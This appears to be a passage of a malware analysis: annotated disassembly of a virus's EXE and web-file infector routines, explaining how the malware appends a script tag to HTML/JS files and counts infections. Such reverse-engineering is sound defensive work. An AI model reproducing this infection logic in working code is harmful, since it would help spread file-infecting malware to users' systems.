00406608 |. F6D2 ||NOT DL

0040660A |. 8811 ||MOV BYTE PTR DS:[ECX],DL

0040660C |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14]

0040660F |. 41 ||INC ECX

00406610 |. 41 ||INC ECX

00406611 |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]

00406617 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX

0040661A |.^ 72 E2 |/JB SHORT LSASS.004065FE

0040661C |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0

00406620 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20]

00406623 |. 50 |PUSH EAX

00406624 |. 6A 01 |PUSH 1

00406626 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]

0040662C |. FFD7 |CALL EDI ; fwrite

0040662E |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]

00406631 |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX

00406634 |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]

0040663A |. 6A 01 |PUSH 1

0040663C |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]

00406642 |. FFD3 |CALL EBX ; fread, read next

00406644 |. 83C4 20 |ADD ESP,20

00406647 |.^ EB 9E /JMP SHORT LSASS.004065E7

00406649 |> FF75 E0 PUSH DWORD PTR SS:[EBP-20]

0040664C |. 8B0D 3CD04000 MOV ECX,DWORD PTR DS:[40D03C]

00406652 |. 8D46 64 LEA EAX,DWORD PTR DS:[ESI+64]

00406655 |. 6A 04 PUSH 4

00406657 |. 6A 01 PUSH 1

00406659 |. 50 PUSH EAX

0040665A |. 8908 MOV DWORD PTR DS:[EAX],ECX

0040665C |. FFD7 CALL EDI

0040665E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream

00406661 |. 8B3D 90A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fclose>] ; |msvcrt.fclose

00406667 |. FFD7 CALL EDI ; /fclose

00406669 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]

0040666C |. FFD7 CALL EDI

0040666E |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block

00406674 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free

0040667A |. 83C4 1C ADD ESP,1C

0040667D |. FF05 04F44000 INC DWORD PTR DS:[40F404]

00406683 |. C686 B3010000 01 MOV BYTE PTR DS:[ESI+1B3],1

0040668A |. EB 0D JMP SHORT LSASS.00406699

0040668C |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block

00406692 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free

00406698 |. 59 POP ECX

00406699 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF

0040669D |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]

004066A0 |. E8 571E0000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004066A5 |. 32C0 XOR AL,AL

004066A7 |> 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]

004066AA |. 5F POP EDI

004066AB |. 5E POP ESI

004066AC |. 64:890D 00000000 MOV DWORD PTR FS:[0],ECX

004066B3 |. 5B POP EBX

004066B4 |. C9 LEAVE

004066B5 /. C3 RETN

3 web文件感染函数（00402B97，thiscall；参数1 = 目标文件路径 CString，参数2 = 待追加的 script 标签 CString，RETN 8。先整读文件查找标记，未找到则以写模式打开并在文件尾追加，然后递增全局计数 0x40F408）

; ---------------------------------------------------------------------------
; 00402B97  web-file infector (script-tag appender)
;
; Recovered calling convention: thiscall (ECX = this), two CString arguments
; passed BY VALUE on the stack and destroyed by the callee, RETN 8:
;     [EBP+8]  path   - file to infect (first DWORD of a CString is its LPCTSTR)
;     [EBP+C]  marker - text to append; supplied by the caller, not visible here
;
; Observed behaviour (every claim below maps to an instruction in this listing):
;   1. opens `path` with ifstream (mode 1 = ios::in in the old MSVCIRT iostream)
;      and, until eofbit is set, reads it with getline(buf, 0x400, '\n') into a
;      CString accumulator at [EBP-10]; the stripped '\n' is NOT re-added, and
;      the accumulator is only ever used for the Find() test, never written back;
;   2. CString::Find(marker) == -1  ->  re-open `path` for write through the file
;      object embedded at this+0x1B8 (virtual slots 0x28/0x30/0x40/0x54, which the
;      original analyst labelled open/seek/write/close), seek (0, from=2) i.e. to
;      end of file, write `marker` (length taken from the CStringData header) and
;      ++[0x40F408], a global "web files infected" counter (the EXE infector keeps
;      its own at 0x40F404, see 0040667D);
;   3. Find() != -1  ->  file already carries the marker, nothing is written
;      (re-infection is prevented, so the routine is idempotent per file).
;   No return value is produced on purpose: EAX at RETN is whatever the last
;   CString destructor left in it.
;
; Review notes:
;   * The read loop exits only on eofbit (TEST ...,BL with BL=1). If getline sets
;     failbit on a line of >= 0x3FF chars without reaching EOF, later getline
;     calls on a failed stream read nothing and the loop would keep appending
;     the stale buffer to the accumulator -> hang / memory growth on a
;     long-line input. TODO confirm against MSVCIRT getline semantics.
;   * The marker is appended raw, with no preceding newline; for a target whose
;     last line is an unterminated `//` comment (e.g. a .js file) the payload
;     would land inside that comment. Not verified on samples.
;   * The write open passes flag 1 only (CFile::modeWrite if the embedded object
;     is an MFC CFile -- the vtable slot layout does not match plain MFC42 CFile,
;     so the exact class is unconfirmed); failures (read-only, locked, ACL) are
;     swallowed silently and the write return value is never checked.
; ---------------------------------------------------------------------------
00402B97 /$ B8 41904000 MOV EAX,LSASS.00409041 ; web-file infector entry; EAX = C++ EH handler/unwind-table thunk consumed by _EH_prolog

00402B9C |. E8 5F5B0000 CALL <JMP.&MSVCRT._EH_prolog> ; builds the EBP frame and links an EH record at FS:[0] (unlinked at 00402CD3)

00402BA1 |. 81EC 60040000 SUB ESP,460 ; locals: 0x400-byte line buffer at [EBP-46C], ifstream at [EBP-6C], CString accumulator at [EBP-10]

00402BA7 |. 53 PUSH EBX ; preserve callee-saved regs

00402BA8 |. 56 PUSH ESI

00402BA9 |. 8BF1 MOV ESI,ECX ; ESI = this (thiscall); the file object used for writing lives at this+0x1B8

00402BAB |. 6A 01 PUSH 1

00402BAD |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] ; ECX = &accum (CString that receives the whole file)

00402BB0 |. 5B POP EBX ; EBX = 1; reused below as ios::in, vbase-ctor flag, eofbit mask, write-open flag and EH state

00402BB1 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX ; EH unwind state = 1

00402BB4 |. E8 4F590000 CALL <JMP.&MFC42.#540_??0CString@@QAE@X> ; CString::CString()  -> accum = ""

00402BB9 |. A1 18A34000 MOV EAX,DWORD PTR DS:[<&MSVCIRT.?openpr> ; EAX = &filebuf::openprot (default protection/share value)

00402BBE |. 53 PUSH EBX ; hidden "construct virtual base" flag = 1 (ios is a virtual base of ifstream)

00402BBF |. 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C] ; ECX = &in (ifstream object)

00402BC2 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2 ; EH unwind state = 2

00402BC6 |. FF30 PUSH DWORD PTR DS:[EAX] ; prot = filebuf::openprot

00402BC8 |. 53 PUSH EBX ; mode = 1 = ios::in

00402BC9 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; name = path (LPCTSTR of the by-value CString arg 1)

00402BCC |. FF15 14A34000 CALL DWORD PTR DS:[<&MSVCIRT.??0ifstrea>; ifstream::ifstream(name, mode, prot) -- open target for reading

00402BD2 |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C]

00402BD5 |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3 ; EH unwind state = 3 (in is fully constructed)

00402BD9 |. 85C0 TEST EAX,EAX ; compiler-generated NULL check before the vbase adjustment; EAX is a stack address, never 0

00402BDB |. 74 0A JE SHORT LSASS.00402BE7

00402BDD |. 8B45 94 MOV EAX,DWORD PTR SS:[EBP-6C] ; EAX = in.vbptr

00402BE0 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4] ; EAX = displacement of the virtual base `ios` inside ifstream

00402BE3 |. 8D4405 94 LEA EAX,DWORD PTR SS:[EBP+EAX-6C] ; EAX = &in.<ios subobject>

00402BE7 |> F640 08 06 TEST BYTE PTR DS:[EAX+8],6 ; ios state (at +8) & (failbit|badbit)  ==  in.fail()

00402BEB |. 0F85 A4000000 JNZ LSASS.00402C95 ; could not open for reading -> cleanup, nothing is modified

00402BF1 |. 85C0 TEST EAX,EAX

00402BF3 |. 0F84 9C000000 JE LSASS.00402C95 ; (second NULL check; unreachable in practice)

00402BF9 |. 68 10F44000 PUSH LSASS.0040F410 ; global LPCTSTR that seeds the accumulator -- contents not visible here (presumably "", TODO confirm)

00402BFE |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]

00402C01 |. E8 165A0000 CALL <JMP.&MFC42.#860_??4CString@@QAEAB> ; accum = (LPCTSTR)0x40F410

00402C06 |> 8B45 94 /MOV EAX,DWORD PTR SS:[EBP-6C] ; read loop: EAX = in.vbptr

00402C09 |. 8B40 04 |MOV EAX,DWORD PTR DS:[EAX+4] ; EAX = displacement of `ios`

00402C0C |. 845C05 9C |TEST BYTE PTR SS:[EBP+EAX-64],BL ; ios state & eofbit(1): [EBP-64] = [EBP-6C] + 8

00402C10 |. 75 28 |JNZ SHORT LSASS.00402C3A ; EOF -> stop reading. NOTE(review): failbit alone does not end the loop (see header)

00402C12 |. 6A 0A |PUSH 0A ; delim = '\n'

00402C14 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C] ; line buffer, 0x400 bytes

00402C1A |. 68 00040000 |PUSH 400 ; limit = 1024 (including the terminating NUL)

00402C1F |. 50 |PUSH EAX

00402C20 |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C] ; ECX = &in

00402C23 |. FF15 10A34000 |CALL DWORD PTR DS:[<&MSVCIRT.?getline@>; istream::getline(buf, 1024, '\n') -- the delimiter is consumed and not stored

00402C29 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C]

00402C2F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]

00402C32 |. 50 |PUSH EAX

00402C33 |. E8 0E5A0000 |CALL <JMP.&MFC42.#941_??YCString@@QAEA> ; accum += line  (no '\n' re-added; accum is only used for Find below)

00402C38 |.^ EB CC /JMP SHORT LSASS.00402C06

00402C3A |> 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]

00402C3D |. FF15 0CA34000 CALL DWORD PTR DS:[<&MSVCIRT.?close@ifs>; close the input stream (OllyDbg's import label and its comment disagree on ifstream/ofstream; same close here)

00402C43 |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; marker (LPCTSTR of the by-value CString arg 2)

00402C46 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]

00402C49 |. E8 C2590000 CALL <JMP.&MFC42.#2764_?Find@CString@@Q> ; accum.Find(marker) -- is the file already infected?

00402C4E |. 83F8 FF CMP EAX,-1

00402C51 |. 75 42 JNZ SHORT LSASS.00402C95 ; marker present -> leave the file untouched (idempotent)

00402C53 |. 8B86 B8010000 MOV EAX,DWORD PTR DS:[ESI+1B8] ; EAX = vtable of the file object embedded at this+0x1B8

00402C59 |. 81C6 B8010000 ADD ESI,1B8 ; ESI = &file (this is no longer needed past this point)

00402C5F |. 6A 00 PUSH 0 ; 3rd arg = NULL (pError, if this is a CFile-style Open -- class unconfirmed)

00402C61 |. 53 PUSH EBX ; 2nd arg = 1 (CFile::modeWrite if CFile; no share flags are passed)

00402C62 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; 1st arg = path (same file that was just read)

00402C65 |. 8BCE MOV ECX,ESI

00402C67 |. FF50 28 CALL DWORD PTR DS:[EAX+28] ; virtual slot 0x28: open `path` for writing (analyst's label: openfile)

00402C6A |. 85C0 TEST EAX,EAX

00402C6C |. 74 27 JE SHORT LSASS.00402C95 ; open failed (read-only, locked, ACL...) -> give up silently

00402C6E |. 8B06 MOV EAX,DWORD PTR DS:[ESI]

00402C70 |. 6A 02 PUSH 2 ; nFrom = 2 (CFile::end if CFile)

00402C72 |. 6A 00 PUSH 0 ; lOff = 0

00402C74 |. 8BCE MOV ECX,ESI

00402C76 |. FF50 30 CALL DWORD PTR DS:[EAX+30] ; virtual slot 0x30: seek to end of file -> payload is appended, original bytes untouched (analyst's label: seekfile)

00402C79 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] ; EAX = marker LPCTSTR

00402C7C |. 8B16 MOV EDX,DWORD PTR DS:[ESI]

00402C7E |. 8B48 F8 MOV ECX,DWORD PTR DS:[EAX-8] ; ECX = CStringData::nDataLength (MFC42 header precedes the chars: nRefs@-0xC, nDataLength@-8, nAllocLength@-4)

00402C81 |. 51 PUSH ECX ; nCount = marker length

00402C82 |. 50 PUSH EAX ; lpBuf = marker

00402C83 |. 8BCE MOV ECX,ESI

00402C85 |. FF52 40 CALL DWORD PTR DS:[EDX+40] ; virtual slot 0x40: write marker at EOF; no newline before it, result not checked (analyst's label: writefile)

00402C88 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]

00402C8A |. 8BCE MOV ECX,ESI

00402C8C |. FF50 54 CALL DWORD PTR DS:[EAX+54] ; virtual slot 0x54: close (analyst's label)

00402C8F |. FF05 08F44000 INC DWORD PTR DS:[40F408] ; ++g_webFilesInfected (global counter; cf. 0x40F404 at 0040667D for EXEs)

00402C95 |> 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60] ; common exit / cleanup. NOTE: destructor `this` is EBP-60 while the ctor used EBP-6C -- presumably the compiler's this-adjustment for the virtual `ios` base (ios plausibly at +0xC); TODO confirm

00402C98 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2

00402C9C |. FF15 08A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ifstrea>; ifstream::~ifstream()

00402CA2 |. 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]

00402CA5 |. FF15 04A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ios@@UA>; ios::~ios() -- virtual base destroyed separately by the most-derived object

00402CAB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]

00402CAE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL ; EH unwind state = 1

00402CB1 |. E8 46580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X> ; ~accum

00402CB6 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0 ; EH unwind state = 0

00402CBA |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]

00402CBD |. E8 3A580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X> ; ~path (callee destroys by-value CString args)

00402CC2 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF ; EH unwind state = -1 (nothing left to unwind)

00402CC6 |. 8D4D 0C LEA ECX,DWORD PTR SS:[EBP+C]

00402CC9 |. E8 2E580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X> ; ~marker

00402CCE |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] ; ECX = previous EH record saved by _EH_prolog

00402CD1 |. 5E POP ESI

00402CD2 |. 5B POP EBX

00402CD3 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX ; unlink this frame's EH record

00402CDA |. C9 LEAVE

00402CDB /. C2 0800 RETN 8 ; thiscall with 8 bytes of stack args; EAX is not set deliberately on any path
